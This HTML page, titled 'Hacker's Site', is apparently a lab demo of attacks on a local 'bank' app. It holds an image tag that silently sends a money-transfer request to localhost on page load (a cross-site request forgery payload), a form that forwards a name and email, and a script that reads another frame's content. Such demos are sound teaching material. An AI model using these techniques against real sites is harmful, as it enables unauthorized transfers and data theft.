<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Hacker's Site</title>
    <script>
        function submit(){
            event.preventDefault();
            var url = "http://localhost:3000/text";
            var xmlSubmit = new XMLHttpRequest();
            var name = document.getElementById("name").value;
            var email = document.getElementById("email").value;
            var body = "name="+name+"&email="+email;
            console.log(url+"?"+body);
            xmlSubmit.open( "GET", url+"?"+body, false); // false for synchronous request
            xmlSubmit.send();
            var response = xmlSubmit.responseText;
            console.log(response);
        }


        function getCookie(){
            var iframe = document.getElementById("frame");
            var elmnt = iframe.contentWindow.document.getElementsByTagName("H1")[0];
            document.getElementById("demo").innerHTML = elmnt.innerHTML;
        }
    </script>

</head>
<body>
    <h1>
        Hacker's Site
    </h1>

        <input type="text" id="name" name="name" placeholder="Enter your name"><br>
        <input type="text" id="email" name="email" placeholder="Enter your email"><br>
        <input type="button" onclick=submit() value="Go to Bank's Site">
        <input type="button" onclick=getCookie() value="oframe value">

        <br>
        <p id="demo"></p>

        <img src="http://localhost:3000/transfer?account=625daa8ed06617e14de8669d&amount=15">
</body>
</html>